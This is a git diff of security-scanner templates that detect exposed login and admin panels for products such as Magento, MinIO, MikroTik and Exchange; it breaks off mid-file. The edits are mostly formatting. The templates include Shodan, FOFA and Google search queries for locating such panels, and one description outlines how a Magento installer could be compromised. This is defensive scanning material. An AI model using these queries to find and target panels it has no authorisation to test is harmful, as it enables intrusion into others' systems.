+++ b/http/exposed-panels/mach-proweb-login.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/ghdb/8023 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"Log on to MACH-ProWeb" tags: panel,machproweb,edb diff --git a/http/exposed-panels/machform-admin-panel.yaml b/http/exposed-panels/machform-admin-panel.yaml index f73037ce0c..8f2d099d08 100644 --- a/http/exposed-panels/machform-admin-panel.yaml +++ b/http/exposed-panels/machform-admin-panel.yaml @@ -5,15 +5,15 @@ info: author: ritikchaddha severity: info description: MachForm Admin panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.machform.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"MachForm Admin Panel" tags: panel,machform,admin @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/maestro-login-panel.yaml b/http/exposed-panels/maestro-login-panel.yaml index ff315ce915..472e3c88ba 100644 --- a/http/exposed-panels/maestro-login-panel.yaml +++ b/http/exposed-panels/maestro-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Maestro LuCI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Maestro - LuCI" tags: panel,maestro,luci @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/mag-dashboard-panel.yaml b/http/exposed-panels/mag-dashboard-panel.yaml index a3decf1c73..92c2324809 100644 --- a/http/exposed-panels/mag-dashboard-panel.yaml +++ b/http/exposed-panels/mag-dashboard-panel.yaml @@ -7,11 +7,11 @@ info: description: MAG Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MAG Dashboard Login" tags: panel,mag @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/magento-admin-panel.yaml b/http/exposed-panels/magento-admin-panel.yaml index 5fa56a3d76..254aef1e13 100644 --- a/http/exposed-panels/magento-admin-panel.yaml +++ b/http/exposed-panels/magento-admin-panel.yaml @@ -10,11 +10,11 @@ info: - https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"Magento" tags: magento,panel @@ -25,9 +25,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index 0c93fa1270..a5a23c7fb6 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -5,13 +5,13 @@ info: author: 5up3r541y4n severity: info description: | - Magento Connect Manager installer was detected. The software, available via /downloader/ location, requires Magento admin rights and uses the same authorization methods as for backend. If an attacker locates a matching pair of login/password, the installation will be compromised. An attacker can then discover backend URL for login (even if it is customized as described in Securing Magento /admin/) and install a Filesystem extension to obtain full access to all files and finally the database. + Magento Connect Manager installer was detected. The software, available via /downloader/ location, requires Magento admin rights and uses the same authorization methods as for backend. If an attacker locates a matching pair of login/password, the installation will be compromised. An attacker can then discover backend URL for login (even if it is customized as described in Securing Magento /admin/) and install a Filesystem extension to obtain full access to all files and finally the database. reference: - https://magentary.com/kb/restrict-access-to-magento-downloader/ - https://www.mageplaza.com/kb/how-to-stop-brute-force-attacks-magento.html#solution-3 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"Magento" tags: magento,exposure,panel @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/magnolia-panel.yaml b/http/exposed-panels/magnolia-panel.yaml index 85fbf14e59..d8dc4cd4f4 100644 --- a/http/exposed-panels/magnolia-panel.yaml +++ b/http/exposed-panels/magnolia-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.magnolia-cms.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"Magnolia is a registered trademark" tags: magnolia,panel,login @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/.magnolia/admincentral" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/mailhog-panel.yaml b/http/exposed-panels/mailhog-panel.yaml index 1bdd05ef18..9012559ff3 100644 --- a/http/exposed-panels/mailhog-panel.yaml +++ b/http/exposed-panels/mailhog-panel.yaml @@ -10,11 +10,11 @@ info: - https://github.com/mailhog/MailHog classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"mailhog" tags: panel,mailhog,mail,smtp diff --git a/http/exposed-panels/mailwatch-login.yaml b/http/exposed-panels/mailwatch-login.yaml index 20f8952fa1..410fdf75e1 100644 --- a/http/exposed-panels/mailwatch-login.yaml +++ b/http/exposed-panels/mailwatch-login.yaml @@ -7,11 +7,11 @@ info: description: MailWatch login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MailWatch Login Page" tags: panel,mailwatch @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/maltrail-panel.yaml b/http/exposed-panels/maltrail-panel.yaml index 056574a0d5..9aceeac04f 100644 --- a/http/exposed-panels/maltrail-panel.yaml +++ b/http/exposed-panels/maltrail-panel.yaml @@ -7,8 +7,8 @@ info: description: | Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name, URL (e.g. hXXp://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Maltrail" tags: panel,maltrail,detect diff --git a/http/exposed-panels/mantisbt-panel.yaml b/http/exposed-panels/mantisbt-panel.yaml index 432270804a..ace206c4e3 100644 --- a/http/exposed-panels/mantisbt-panel.yaml +++ b/http/exposed-panels/mantisbt-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.mantisbt.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:662709064 tags: panel,mantisbt diff --git a/http/exposed-panels/matomo-login-portal.yaml b/http/exposed-panels/matomo-login-portal.yaml index 30cfde1810..52ee56e458 100644 --- a/http/exposed-panels/matomo-login-portal.yaml +++ b/http/exposed-panels/matomo-login-portal.yaml @@ -7,11 +7,11 @@ info: description: Matomo logjn panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,matomo metadata: max-request: 2 + tags: panel,matomo http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index 63aaa63827..94728ca049 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/mautic/mautic classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,mautic,crm,panel metadata: max-request: 1 + tags: tech,mautic,crm,panel http: - method: GET diff --git a/http/exposed-panels/meshcentral-login.yaml b/http/exposed-panels/meshcentral-login.yaml index 7675f084fb..7184c1843c 100644 --- a/http/exposed-panels/meshcentral-login.yaml +++ b/http/exposed-panels/meshcentral-login.yaml @@ -7,7 +7,7 @@ info: description: MeshCentral login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/metabase-panel.yaml b/http/exposed-panels/metabase-panel.yaml index 60fac8f594..ebfdd99655 100644 --- a/http/exposed-panels/metabase-panel.yaml +++ b/http/exposed-panels/metabase-panel.yaml @@ -7,7 +7,7 @@ info: description: Metabase login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/metasploit-panel.yaml b/http/exposed-panels/metasploit-panel.yaml index 18bbb2e034..4434c4c814 100644 --- a/http/exposed-panels/metasploit-panel.yaml +++ b/http/exposed-panels/metasploit-panel.yaml @@ -8,13 +8,13 @@ info: Metasploit Web Panel is detected classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true - zoomeye-query: title:'Metasploit' + max-request: 1 shodan-query: http.title:"metasploit" + zoomeye-query: title:'Metasploit' tags: panel,metasploit,login http: diff --git a/http/exposed-panels/metasploit-setup-page.yaml b/http/exposed-panels/metasploit-setup-page.yaml index 5b588fae53..3377c97dc6 100644 --- a/http/exposed-panels/metasploit-setup-page.yaml +++ b/http/exposed-panels/metasploit-setup-page.yaml @@ -7,11 +7,11 @@ info: description: Metasploit setup and configuration page was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Metasploit - Setup and Configuration" tags: panel,metasploit,setup diff --git a/http/exposed-panels/metersphere-login.yaml b/http/exposed-panels/metersphere-login.yaml index e78747555e..fe39cce805 100644 --- a/http/exposed-panels/metersphere-login.yaml +++ b/http/exposed-panels/metersphere-login.yaml @@ -9,11 +9,11 @@ info: - https://github.com/metersphere/metersphere classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,metersphere metadata: max-request: 2 + tags: panel,metersphere http: - method: GET @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/login" stop-at-first-match: true + matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" diff --git a/http/exposed-panels/mfiles-web-detect.yaml b/http/exposed-panels/mfiles-web-detect.yaml index 6f33b2d2b1..18c9bcf2c3 100644 --- a/http/exposed-panels/mfiles-web-detect.yaml +++ b/http/exposed-panels/mfiles-web-detect.yaml @@ -9,11 +9,11 @@ info: - https://www.m-files.com/about/trust-center/security-advisories/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"M-Files Web" tags: panel,m-files @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/Login.aspx" stop-at-first-match: true + matchers-condition: or matchers: - type: regex diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index 9ccefc7e99..d72b7590a8 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -7,11 +7,11 @@ info: description: Micro Focus Enterprise Server Admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "Micro Focus DSD" tags: panel,exposure,microfocus,admin diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 9385f122a2..d68031e87b 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -7,11 +7,11 @@ info: description: Micro Focus Filr login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus Filr" tags: panel,microfocus,filr diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index 4b09eff58b..9747ccb35c 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -7,11 +7,11 @@ info: description: Micro Focus Vibe login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus Vibe" tags: panel,microfocus,vibe @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/microsoft-exchange-panel.yaml b/http/exposed-panels/microsoft-exchange-panel.yaml index 7367419568..c1d81ee6f7 100644 --- a/http/exposed-panels/microsoft-exchange-panel.yaml +++ b/http/exposed-panels/microsoft-exchange-panel.yaml @@ -9,11 +9,11 @@ info: - https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: microsoft,panel,exchange metadata: max-request: 1 + tags: microsoft,panel,exchange http: - method: GET diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index 2e878c1814..c36cd74332 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -7,11 +7,11 @@ info: description: MikroTik RouterOS admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"mikrotik routeros > administration" tags: panel,login,mikrotik diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml index 33b0600e3c..b6c3d2d8d5 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -9,11 +9,11 @@ info: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login metadata: max-request: 1 + tags: panel,login http: - method: GET diff --git a/http/exposed-panels/mini-start-page.yaml b/http/exposed-panels/mini-start-page.yaml index 402534577d..604bf59be1 100644 --- a/http/exposed-panels/mini-start-page.yaml +++ b/http/exposed-panels/mini-start-page.yaml @@ -9,23 +9,25 @@ info: - https://www.exploit-db.com/ghdb/6500 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel metadata: max-request: 2 + tags: edb,panel http: - method: GET path: - "{{BaseURL}}/start.html" - "{{BaseURL}}/www/start.html" + matchers-condition: and matchers: - type: word words: - 'Miniweb Start Page' part: body + - type: status status: - 200 diff --git a/http/exposed-panels/minio-browser.yaml b/http/exposed-panels/minio-browser.yaml index 2033bd26b0..828cb6bf25 100644 --- a/http/exposed-panels/minio-browser.yaml +++ b/http/exposed-panels/minio-browser.yaml @@ -7,7 +7,7 @@ info: description: MinIO Browser login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/minio-console.yaml b/http/exposed-panels/minio-console.yaml index 1d9830fb3b..7001f11d11 100644 --- a/http/exposed-panels/minio-console.yaml +++ b/http/exposed-panels/minio-console.yaml @@ -7,13 +7,13 @@ info: description: MinIO Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,minio metadata: max-request: 1 - fofa-query: app="MinIO-Console" shodan-query: title:"MinIO Console" + fofa-query: app="MinIO-Console" + tags: panel,minio http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: dsl dsl: - "contains(tolower(body), 'minio console')" diff --git a/http/exposed-panels/misp-panel.yaml b/http/exposed-panels/misp-panel.yaml index 21ea607721..67bbdbbf80 100644 --- a/http/exposed-panels/misp-panel.yaml +++ b/http/exposed-panels/misp-panel.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: verified: "true" - shodan-query: http.title:"Users - MISP" max-request: 1 + shodan-query: http.title:"Users - MISP" tags: panel,misp http: diff --git a/http/exposed-panels/mitel-panel-detect.yaml b/http/exposed-panels/mitel-panel-detect.yaml index c09cea1974..fbb59b7d93 100644 --- a/http/exposed-panels/mitel-panel-detect.yaml +++ b/http/exposed-panels/mitel-panel-detect.yaml @@ -7,11 +7,11 @@ info: description: Mitel login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"Mitel Networks" tags: panel,mitel @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/mobile-management-panel.yaml b/http/exposed-panels/mobile-management-panel.yaml index 670acef028..0e5af86a34 100644 --- a/http/exposed-panels/mobile-management-panel.yaml +++ b/http/exposed-panels/mobile-management-panel.yaml @@ -7,11 +7,11 @@ info: description: Mobile Management Platform panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="移动管理平台-企业管理" tags: panel,mobile,management diff --git a/http/exposed-panels/mobileiron-login.yaml b/http/exposed-panels/mobileiron-login.yaml index 19b8194432..fd700f4c3f 100644 --- a/http/exposed-panels/mobileiron-login.yaml +++ b/http/exposed-panels/mobileiron-login.yaml @@ -7,11 +7,11 @@ info: description: MobileIron login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,mobileiron metadata: max-request: 3 + tags: panel,mobileiron http: - method: GET @@ -19,7 +19,9 @@ http: - "{{BaseURL}}/mifs/login.jsp" - "{{BaseURL}}/mifs/user/login.jsp" - "{{BaseURL}}/mifs/c/d/android.html" + stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -29,6 +31,7 @@ http: - "MobileIron Registration" - "Mobilizing enterprise applications" - "whitelabel/mobileiron/img/favicon.ico" + - type: status status: - 200 diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index 9e7f108aa1..f55d859a2a 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -8,8 +8,8 @@ info: reference: - https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:967636089 tags: panel,mobileiron diff --git a/http/exposed-panels/modoboa-panel.yaml b/http/exposed-panels/modoboa-panel.yaml index 73159551f8..faf8426613 100644 --- a/http/exposed-panels/modoboa-panel.yaml +++ b/http/exposed-panels/modoboa-panel.yaml @@ -10,11 +10,11 @@ info: - https://github.com/modoboa/modoboa classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:1949005079 tags: panel,modoboa,mail @@ -27,6 +27,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/mongodb-ops-manager.yaml b/http/exposed-panels/mongodb-ops-manager.yaml index 6a3384444b..f833244db0 100644 --- a/http/exposed-panels/mongodb-ops-manager.yaml +++ b/http/exposed-panels/mongodb-ops-manager.yaml @@ -7,7 +7,7 @@ info: description: MongoDB Ops Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - 'MongoDB Ops Manager' + - type: status status: - 200 diff --git a/http/exposed-panels/monitorix-exposure.yaml b/http/exposed-panels/monitorix-exposure.yaml index ca66924e54..1d5a9b4397 100644 --- a/http/exposed-panels/monitorix-exposure.yaml +++ b/http/exposed-panels/monitorix-exposure.yaml @@ -9,11 +9,11 @@ info: - https://www.monitorix.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: monitorix,exposure,logs,panel metadata: max-request: 1 + tags: monitorix,exposure,logs,panel http: - method: GET @@ -31,6 +31,7 @@ http: - "" - "1day.png'" condition: and + - type: status status: - 200 diff --git a/http/exposed-panels/monstra-admin-panel.yaml b/http/exposed-panels/monstra-admin-panel.yaml index 8ed64e71ab..0ae865202d 100644 --- a/http/exposed-panels/monstra-admin-panel.yaml +++ b/http/exposed-panels/monstra-admin-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/monstra-cms/monstra/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:419828698 tags: panel,monstra diff --git a/http/exposed-panels/movable-type-login.yaml b/http/exposed-panels/movable-type-login.yaml index a73bd2fab0..e8a0a02e15 100644 --- a/http/exposed-panels/movable-type-login.yaml +++ b/http/exposed-panels/movable-type-login.yaml @@ -7,7 +7,7 @@ info: description: Movable Type Pro login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - '{{BaseURL}}/mt.cgi' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/mpftvc-admin-panel.yaml b/http/exposed-panels/mpftvc-admin-panel.yaml index 4d8323196c..357e7965cb 100644 --- a/http/exposed-panels/mpftvc-admin-panel.yaml +++ b/http/exposed-panels/mpftvc-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: MPFTVC admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"AdminLogin - MPFTVC" tags: panel,mpftvc,admin diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml index d99769ae20..21d6353040 100644 --- a/http/exposed-panels/mpsec-isg1000-panel.yaml +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: + verified: true max-request: 1 fofa-query: "迈普通信技术股份有限公司" - verified: true tags: panel,login,mpsec,isg1000 http: diff --git a/http/exposed-panels/ms-adcs-detect.yaml b/http/exposed-panels/ms-adcs-detect.yaml index 1233825077..3311556060 100644 --- a/http/exposed-panels/ms-adcs-detect.yaml +++ b/http/exposed-panels/ms-adcs-detect.yaml @@ -7,11 +7,11 @@ info: description: Microsoft Active Directory Certificate Services panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: microsoft,ad,panel metadata: max-request: 1 + tags: microsoft,ad,panel http: - method: GET diff --git a/http/exposed-panels/mspcontrol-login.yaml b/http/exposed-panels/mspcontrol-login.yaml index bb4c60d60d..e416f7339d 100644 --- a/http/exposed-panels/mspcontrol-login.yaml +++ b/http/exposed-panels/mspcontrol-login.yaml @@ -10,7 +10,7 @@ info: - https://mspcontrol.org/downloads/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/mybb-forum-detect.yaml b/http/exposed-panels/mybb-forum-detect.yaml index 17fd3665b6..37b7f22943 100644 --- a/http/exposed-panels/mybb-forum-detect.yaml +++ b/http/exposed-panels/mybb-forum-detect.yaml @@ -7,11 +7,11 @@ info: description: MyBB login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MyBB" tags: panel,mybb,forum diff --git a/http/exposed-panels/mybb/mybb-forum-install.yaml b/http/exposed-panels/mybb/mybb-forum-install.yaml index b57389ab29..f2dfbb9a60 100644 --- a/http/exposed-panels/mybb/mybb-forum-install.yaml +++ b/http/exposed-panels/mybb/mybb-forum-install.yaml @@ -10,8 +10,8 @@ info: cvss-score: 8.6 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MyBB" tags: panel,mybb,forum diff --git a/http/exposed-panels/mylittleadmin-panel.yaml b/http/exposed-panels/mylittleadmin-panel.yaml index f33c2e1d71..9cb2b4f35b 100644 --- a/http/exposed-panels/mylittleadmin-panel.yaml +++ b/http/exposed-panels/mylittleadmin-panel.yaml @@ -10,11 +10,11 @@ info: - http://mylittleadmin.com/en/overview.aspx classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"myLittleAdmin" tags: panel,mylittleadmin,login diff --git a/http/exposed-panels/mylittlebackup-panel.yaml b/http/exposed-panels/mylittlebackup-panel.yaml index 567fce9d02..09edfd42f7 100644 --- a/http/exposed-panels/mylittlebackup-panel.yaml +++ b/http/exposed-panels/mylittlebackup-panel.yaml @@ -10,11 +10,11 @@ info: - http://www.mylittlebackup.com/mlb/en/overview.aspx classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.html:"myLittleBackup" tags: panel,mylittlebackup @@ -28,6 +28,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/mystrom-panel.yaml 